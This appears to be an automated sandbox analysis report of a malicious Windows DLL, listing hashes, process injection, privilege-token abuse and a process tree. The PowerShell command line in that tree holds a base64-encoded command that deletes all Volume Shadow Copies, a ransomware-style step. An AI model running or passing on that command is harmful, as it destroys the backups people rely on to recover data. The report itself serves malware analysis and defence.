Analysis
- max time kernel: 10s
- max time network: 67s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 08-04-2021 20:04
Static task: static1
Behavioral task: behavioral1
- Sample: e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll
- Resource: win10v20201028
General
- Target: e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll
- Size: 166KB
- MD5: a2fe81e5b83c0d1ea321429446870e18
- SHA1: b1fc2a1e8e1739ecf9fe2e0b7b20618321eea765
- SHA256: e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e
- SHA512: b0a250932cebbcfed89564a67c6b5385b9a65e089810bd071b1be721af7fee55af8ec31fd7b415295b6bbd1b2f1ef564c4a8c3c7b40101d1e90e5fb0cd7905c9
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Process: rundll32.exe
  Description: File opened (read-only)
  IoCs: \??\A:, \??\B:, \??\F:, \??\G:, \??\I:, \??\R:, \??\U:, \??\E:, \??\H:, \??\M:, \??\N:, \??\Q:, \??\S:, \??\Z:, \??\J:, \??\T:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\K:, \??\L:, \??\O:, \??\P:
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid / process:
  1320 rundll32.exe
  1320 rundll32.exe
  3420 powershell.exe
  3420 powershell.exe
  3420 powershell.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description / pid / process:
  Token: SeDebugPrivilege / 1320 / rundll32.exe
  Token: SeDebugPrivilege / 3420 / powershell.exe
  Token: SeBackupPrivilege / 768 / vssvc.exe
  Token: SeRestorePrivilege / 768 / vssvc.exe
  Token: SeAuditPrivilege / 768 / vssvc.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  description / pid / process / target process:
  PID 1152 wrote to memory of 1320 / 1152 / rundll32.exe / rundll32.exe
  PID 1152 wrote to memory of 1320 / 1152 / rundll32.exe / rundll32.exe
  PID 1152 wrote to memory of 1320 / 1152 / rundll32.exe / rundll32.exe
  PID 1320 wrote to memory of 3420 / 1320 / rundll32.exe / powershell.exe
  PID 1320 wrote to memory of 3420 / 1320 / rundll32.exe / powershell.exe
Processes
- C:\Windows\system32\rundll32.exe (PID 1152)
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll,#1
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe (PID 1320)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll,#1
    Signatures: Enumerates connected drives; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3420)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe (PID 184)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (PID 768)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/1320-114-0x0000000000000000-mapping.dmp
- memory/3420-115-0x0000000000000000-mapping.dmp
- memory/3420-121-0x0000025B42140000-0x0000025B42141000-memory.dmp (Filesize: 4KB)
- memory/3420-124-0x0000025B422F0000-0x0000025B422F1000-memory.dmp (Filesize: 4KB)
- memory/3420-127-0x0000025B41830000-0x0000025B41832000-memory.dmp (Filesize: 8KB)
- memory/3420-128-0x0000025B41833000-0x0000025B41835000-memory.dmp (Filesize: 8KB)
- memory/3420-137-0x0000025B41836000-0x0000025B41838000-memory.dmp (Filesize: 8KB)